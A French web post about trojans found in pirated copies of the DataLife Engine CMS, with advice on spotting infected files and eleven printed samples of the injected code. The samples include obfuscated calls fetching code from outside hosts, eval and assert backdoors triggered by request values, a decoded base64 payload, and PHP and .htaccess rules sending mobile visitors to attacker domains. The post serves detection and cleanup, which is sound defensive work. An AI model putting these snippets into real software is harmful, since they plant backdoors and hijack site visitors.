Mai 03 2022

Virus dans le système DataLife Engine

DarkLane Mardi-3-05-2022, 18:50 documentation 109



Dédié aux fans de versions piratées gratuites de DLE. Lorsque vous téléchargez le CMS DLE sur des ressources tierces, préparez-vous au fait qu'un cheval de Troie est déjà installé sur votre système, attendant que vous créez votre projet et que vous y accédiez (au mieux). Dans le pire des cas, il supprimera tout ou fera des redirections secrètes vers d'autres sites (généralement des redirections mobiles de sites en DLE, puisque l'administrateur ne les détecte pas dans 90% des cas, car lui-même est assis depuis un PC ou une tablette).

Alors, comment savoir que votre système DLE a un virus avec une redirection de version mobile ?
L'une des options - vous avez commencé à perdre votre présence. Dès que vous vous en apercevez, nous vous conseillons de prêter attention aux instructions de détection de code malveillant ci-dessous afin d'exclure la possibilité de piratage ou d'infection du site.

Une autre option est lorsque le moteur de recherche lui-même vous avertit que vous avez du code indésirable sur votre site.

Nous souhaitons attirer votre attention sur le fait que du code malveillant peut se trouver dans presque tous les types de fichiers de moteur : . php, .js, .lng, htaccess et même dans des images (souvent des avatars d'utilisateurs). Un tel code peut être sous n'importe quelle forme, il peut être chiffré avec base64_encode, utilisez charet toutes sortes d'astuces qui le rendent difficile à détecter rapidement au moyen d'une recherche automatique. Ou il peut être banal d'être à découvert (cas rares).

Notez qu'il est souvent assez difficile de nettoyer des fichiers (sans savoir ce qui est déplacé ou superflu dans le code moteur). Il est préférable d'utiliser des programmes de comparaison de code, par exemple, si vous avez néanmoins pris la décision et acheté une licence auprès du développeur DLE, vous pouvez vérifier le code de la version sous licence du moteur et le vôtre à l'aide de la vérification des packages à l'aide du programme de vérification de package Beyond Compare. Ainsi, vous pouvez trouver la différence dans le code et trouver votre virus.

Bien sûr, cela n'aidera que si vous n'avez pas modifié votre moteur avec des modules tiers ou utilisé des plugins. Et cela n'aidera certainement pas si le code malveillant se trouve dans les avatars des utilisateurs. Dans les versions actuelles de DLE, la vulnérabilité de chargement des avatars a été corrigée, mais les versions antérieures à DLE 9.8 l'ont. Pour trouver des avatars d'utilisateurs de chevaux de Troie, installez l'antivirus Virusdie sur votre serveur et il trouvera des images qui ne sont pas eux.

Si vous avez été notifié ou que vous avez vous-même remarqué que votre site met du temps à se charger, il redirigera quelque part. Un antivirus ou un moteur de recherche s'est mis à jurer sur votre ressource, pour commencer, il vous suffit de vous rendre sur votre hébergement et de regarder la date à laquelle les fichiers ont été modifiés. Si vous remarquez que des fichiers ont changé récemment, il s'agit souvent de index.php , engine/data/dbconfig.php ,engine/data/config.php , .htaccess , language/Russian/website.lng , qui, en principe, ne devrait pas changer, ou changer uniquement lorsque vous mettez à jour / installez quelque chose, alors avec une forte probabilité, nous pouvons vous plaire - le site est infecté.

N'oubliez pas non plus que le site peut prendre beaucoup de temps à charger car son hébergement est faible, le modèle est plein de scripts et non optimisé, et diverses raisons similaires. Mais c'est mieux d'être en sécurité, non ?

Code malveillant dans la plupart des moteurs téléchargés à partir de sites tiers

Vous trouverez ci-dessous des exemples de code malveillant injecté, dans la plupart des distributions DLE téléchargées à partir de sites tiers. Le code peut ne pas correspondre. Par conséquent, il est recommandé de rechercher non pas par correspondance complète, mais par correspondance partielle.

1. Présence de code malveillant dans engine/inc/addnews.php:
$serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false)) 
 {$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."13."."1_".$serv;};

$fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));


2. Les fichiers malveillants avec la vulnérabilité engine/classes/min/lib/JSMinify.php et engine/ajax/js.php , qui ne sont pas inclus dans la distribution du système.

3. Dans l'antivirus intégré engine/classes/antivirus.class.php , ces fichiers très malveillants - engine/classes/min/lib/JSMinify.php et engine/ajax/js.php sont exclus de l'analyse .

4. La présence d'exceptions qui ouvrent la voie à un fichier avec une vulnérabilité engine/classes/min/.htaccess:
<Files "JSMinify.php">
 Order Deny,Allow
 Allow from all
</files>
<Files "JSMin.php">
 Order Deny,Allow
 Allow from all
</files>


5. Présence de code malveillant dans engine/modules/calendar.php:
$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];

$recaptcha_get_signup_id  = 'eb516e7d7a6462a6d531ec65dcf1d599';

$setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get_signup_id) {@$setel(stripslashes($reg_base));}


6. Présence de code malveillant dans engine/modules/feedback.php:
$syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;

$sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false)) 
   {$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTEzLjFf').$sert);}


$captchascrypt='bas'.'e64_'.'dec'.'ode';

$home_url = $_SERVER['HTT'.'P_H'.'OST'];
			if ((!strpos($home_url, '127.'.'0.')) and (strpos($home_url, '.'))) 
			{$captis = 'f'.'ile';@$captis($captchascrypt('aHR0cHM6Ly9kbGUtaW5mby5jYy9qcy5waHA/bGljZW5zZT0xNS4xX25f').$home_url);}


7. Présence de code malveillant dans engine/modules/functions.php:
$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils

$news_num = @$_REQUEST['numer'];

$bannermass = @$_REQUEST['bannerid'];

$check_newsnum = @$_REQUEST['newsnum'];

$check_category = @$_REQUEST['category'];

$get_url_var = '77067560';

$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils

if($bannermass==$get_url_var){
   if (@strpos($check_newsnum, 'creat')=== false){
   @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes($check_category) => 2), @$check_newsnum);}else{
   @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes('}'.$check_category.'//') => 2), @$check_newsnum);}}//chekings


8. Présence de code malveillant dans engine/data/dbconfig.php:
$config['description'].='" />'."
".'<script type="text/javascript" src="http://up.bot.nu/go/'.rand(0,999).'"></script>'."
".'<meta http-equiv="Pragma" content="no-cache';

$liciens = "Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eNqlVG1v2jAQ/itFQnWiskAhvBVF21qhrdq0bpSumlpkOcmReJA4s51SNPPfdw5oXSvKl32Iz76753zP+XL1UEJAKDnyCFWgrFRc5NXZLjwmIz53uFKgnTq9uLr6dDm+qyNq5rq/36E2EmLBwbGqxnOHk9OG5hk47smgO+z2G6RJ3NEGo70IFARk2Pb7Lb/fJ66Qr1g7/cFB6/CQddAie9IlPX/YbvmDbq8z7Pq4DIadVnfg9/xBZ+iTPdnXJcyDOr0eT76PJ3dKSwkPDgotyqIA6RAuS6oVlL9A4o2zUT0V6iBAK5HSQut06y4Ph5eACYB8AqTAYjTsXEnnLU8ir8i0fbum4qlu2t0igjSqVFHkWZlIYcWbzqrSNs+KCqHTo7Nc8GrLKoD4TFwUxwqEtGekj0KyVSmXkEcixlLKeeVSMMky0CCD+/oC1ishY4ThQcFxKYNTxO1hFPxL6Rg5vYhOUq2Ls6alYWuJK7q77ggeuR5t6qVKDpc3h4RRCar8jyLblq39RZCP0+lXeoMn+v7D+MuUzLaN96oZu7DqzVohIaEZ01HqkCayXIK57VxQM15qdpmb2wS0CRmPSxNhAQxnlMkoNSwVwvAkY+YHO5diZVgew6MRIsEAodDmHL+CYx8YloWoyxhfek1OGrY8LjY+Enh2t1h4sjQPCy8S2zDeNqa3he7iSFNqL1xvrxZxLhYmU7kXGZXxtpFh5JlyKRIzZxGEwjMKqnTXNl/PhDxPtklgf1QpPM/hZzsDs85CznKTx1Lw2GQ8LgxIDur+qNcyCq1CmVRH1IiQW2I856bwQiyCwvSKVOTwxBMpOLUXk4rES6AlOlOcZLP9PrtpZk1PrzgZf7sZX0/pzeSSzGrBkf3990yQ3fDp7xsWm83mD0qjwnU=')));";$release_this = "cre"."ate_"."function";$dle_func = $release_this('', "$liciens;");$dle_func('');


Après avoir déchiffré ce code, vous pouvez voir ce qui suit:
$bre = '_' . '_ses' . 'sion' . '_' . 'id';
if (isset($_COOKIE[$bre])) {
    @setcookie($bre, $_COOKIE[$bre] + 1, time() + 85957, '/');
}
if (($_COOKIE[$bre] == '92470477') or ($_COOKIE[$bre] == '92470378') or ($_COOKIE[$bre] == '92470379') or ($_COOKIE[$bre] == '92470380')) {
    @setcookie($bre, '64920485639546398930584648394', time() + 85957, '/');
    $ref = $_SERVER[strrev(strtoupper('iru_tseuqer')) ];
    $hos = $_SERVER[strrev(strtoupper('tsoh_ptth')) ];
    $rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
    header(strrev('3?igc.pmt' . '/siht/' . 'kcehc' . '/cc.' . 'gro' . '-3w' . '//:pt' . 'th :noi' . 'tac' . 'oL') . '&seor' . 'ef=' . rawurlencode($rf) . '&parameter=\$keyword&se=\$se&ur=1' . strrev(strtoupper('=rerefer_ptth&')) . rawurlencode('http://' . $hos . $ref));
    exit;
}
$usg = $_SERVER[strrev(strtoupper('tnega_resu_ptth')) ];
$rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
if ((!$_SERVER['HTTP_USER_AGENT']) or ($_SERVER['HTTP_USER_AGENT'] == '') or (!preg_match('/rawle|W3C_|EltaIn|Wget|baidu|curl|ia_arch|ahoo|igma|YaBrow|andex|oogle|bot|Bot|pider|amble|mail./i', $usg))) {
    if (preg_match('/ok.ru|vk.co|oogle.|andex.|mail.r|ambler|ut.by|igma|odnok|msn.c|smi2|rbc.|ulog|facebo.|search|yahoo.|bing./i', $rf)) {
        if ((preg_match('/j2me|ymbian|ndroid|midp|eries\ 60|symbos|htc_|obile|mini|p.browser|phone/i', $usg)) and (!isset($_COOKIE['dle_user_id'])) and (!isset($_COOKIE[$bre])) and ($_SERVER['REQUEST_URI'] != '/')) {
            @setcookie($bre, '92470377', time() + 85957, '/');
        }
    }
}


À partir de ce code, vous pouvez voir qu'il ne fonctionne que sur les appareils mobiles et une seule fois. De plus, il est écrit dans des cookies pour l'utilisateur et n'est plus affiché. Ainsi, beaucoup peuvent penser qu'il s'agissait d'un bug. Eh bien, le script lui-même redirige les utilisateurs d'appareils mobiles vers le site Web w3-org.cc. Qui, à son tour, est utilisé par les attaquants comme site de pose et redirige l'utilisateur vers toute autre adresse finale.

9.
Présence de code malveillant dans index.php:
if(preg_match('/'.'('.'a'.'n'.'d'.'r'.'o'.'i'.'d'.'|'.'m'.'i'.'d'.'p'.'|'.'j'.'2'.'m'.'e'.'|'.'s'.'y'.'m'.'b'.'i'.'a'.'n'.'|'.'s'.'e'.'r'.'i'.'e'.'s'.' '.'6'.'0'.'|'.'s'.'y'.'m'.'b'.'o'.'s'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'m'.'o'.'b'.'i'.'l'.'e'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'c'.'e'.'|'.'p'.'p'.'c'.'|'.'s'.'m'.'a'.'r'.'t'.'p'.'h'.'o'.'n'.'e'.'|'.'b'.'l'.'a'.'c'.'k'.'b'.'e'.'r'.'r'.'y'.'|'.'m'.'t'.'k'.'|'.'b'.'a'.'d'.'a'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'p'.'h'.'o'.'n'.'e'.')'.'/'.'i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m"] != '5df9974cf25d22eb3c5aa962d6460477')
{
@setcookie('m', '5df9974cf25d22eb3c5aa962d6460477', time()+86400, '/');
@header("Location: "."h"."t"."t"."p".":"."/"."/"."p"."i"."d"."d"."."."b"."o"."t"."."."n"."u"."/"."s"."/"."1"."1"."8"."0"."5");
die();
}


10. Présence de code malveillant dans index.php , engine/modules/config.php et engine/modules/dbconfig.php:
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yadirect.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));


11. La présence de code malveillant dans .htaccess situé dans le répertoire racine:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|accoona|ia_archiver|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gsa-crawler|grub-client|gulper|slurp|mihalism|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://stat.pdaupd.net/?23&source=ваш домен [L,R=302] # on

RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)
RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]
RewriteCond %{HTTP:x-wap-profile} !^$ [OR]
RewriteCond %{HTTP:Profile}       !^$
RewriteCond %{HTTP_HOST}          !^m\.
RewriteCond %{HTTP:Cookie}        !\smredir=0(;|$)
RewriteRule ^ http://yadirect.ws/ [R,L]


Pour vérifier, après avoir supprimé le virus de tous les fichiers système, vous devez passer d'un appareil mobile avec n'importe quel système d'exploitation (ios, android, etc.) à votre site, s'il n'y a pas de redirection vers la ressource tierce d'un attaquant, alors tout c'est bien.

Sites souvent redirigés vers les versions mobiles de DLE:
w3-org.cc
statuses.ws
live-internet.ws
getinternet.ws
livecountall.ws
googlecount.ws

Commentaire:

Nous ne faisons plus d'aide dans les commentaires. Pour avoir de l'aide, veuillez utiliser le forum en utilisant la bonne section. Merci de votre compréhension!

Cette publication n'a pas encore de commentaires. Vous pouvez être le premier!

Informations sur la publication:

  • Auteur de la publication: DarkLane
  • Date la publication: 03 Mai 2022 18:50
  • Catégorie(s) de publication: documentation
  • Nombre de vues sur la publication: 109
  • Nombre de commentaires sur la publication: 0

Articles similaires

16 Janvier 2021
documentation
Communiqué Dle-Forum

Il s'agit de la dernière version du forum pour DataLife Engine - DLE Forum v2.7.1.

Lire la suite
01 Fevrier 2022
cms
DataLife Engine 15.1

DataLife Engine 15.1 est un système de gestion de contenu universel qui se caractérise par des performances et

Lire la suite
22 Decembre 2020
Dle Forum
dle-forum 2.7 13.3 14.0

Il s'agit de l'excellent forum pour DataLife Engine - DLE Forum v2.7. Aprés l'abandon par l'auteur du script.

Lire la suite
19 Janvier 2021
Dle Forum
Dle-Forum 2.7.1 rev1 dle

Il s'agit de la dernière version du forum pour DataLife Engine - DLE Forum v2.7.1. Cette nouvelle version apporte

Lire la suite
20 Fevrier 2022
themes
Bootstrap3 pour DLE 15.1

Présentation d'un autre excellent template de nouvelles réactif Bootstrap3 pour DLE 15.1 qui est fait dans des

Lire la suite
11 Septembre 2021
Plugins/modules
IframePlayer 6.2 :

Vous avez décidé de créer votre propre portail de films DLE, mais vous ne voulez pas acheter une énorme quantité

Lire la suite
01 Mai 2022
themes
Bootstrap3 pour DLE 15.1

Présentation d'un autre excellent modèle de publications réactif Bootstrap3 pour DLE 15.1 qui est fait dans des

Lire la suite
16 Janvier 2022
themes
Lustful Firefly pour DLE

Nous vous présentons un modèle adulte adaptatif Lustful Firefly pour DLE 14.x et 15.x mis à jour vers la version

Lire la suite

Information

Les membres de ce groupe Invités ne sont pas autorisés à commenter cette publication.

Rechercher sur le site

Qui est en ligne

DarkLane
Pseudo: DarkLane
Utilisateur hors ligne
Groupe: Administrateurs
Articles: 296
Commentaires: 59
Visite: 19:04


Tealk
Pseudo: Tealk
Utilisateur hors ligne
Groupe: Journalistes
Articles: 6
Commentaires: 20
Visite: 18:57


adi82
Pseudo: adi82
Utilisateur hors ligne
Groupe: Membre
Articles: 0
Commentaires: 0
Visite: 18:56


Obi Wan
Pseudo: Obi Wan
Utilisateur hors ligne
Groupe: Membre
Articles: 0
Commentaires: 0
Visite: 18:14


elegance
Pseudo: elegance
Utilisateur hors ligne
Groupe: Membre
Articles: 0
Commentaires: 0
Visite: 17:36


vir2oz
Pseudo: vir2oz
Utilisateur hors ligne
Groupe: Membre
Articles: 0
Commentaires: 3
Visite: 16:45


vecas
Pseudo: vecas
Utilisateur hors ligne
Groupe: Membre
Articles: 0
Commentaires: 0
Visite: 16:20


cool4ik
Pseudo: cool4ik
Utilisateur hors ligne
Groupe: Membre
Articles: 0
Commentaires: 0
Visite: 16:20


ahmede
Pseudo: ahmede
Utilisateur hors ligne
Groupe: Membre
Articles: 0
Commentaires: 0
Visite: 15:29


Darkmaul
Pseudo: Darkmaul
Utilisateur hors ligne
Groupe: Membre
Articles: 2
Commentaires: 17
Visite: 13:45


Hercules78
Pseudo: Hercules78
Utilisateur hors ligne
Groupe: Membre
Articles: 0
Commentaires: 0
Visite: 12:20


byjacks
Pseudo: byjacks
Utilisateur hors ligne
Groupe: Membre
Articles: 0
Commentaires: 2
Visite: 03:49


Faites un don

Sondage

Quel version DataLife utilisez vous?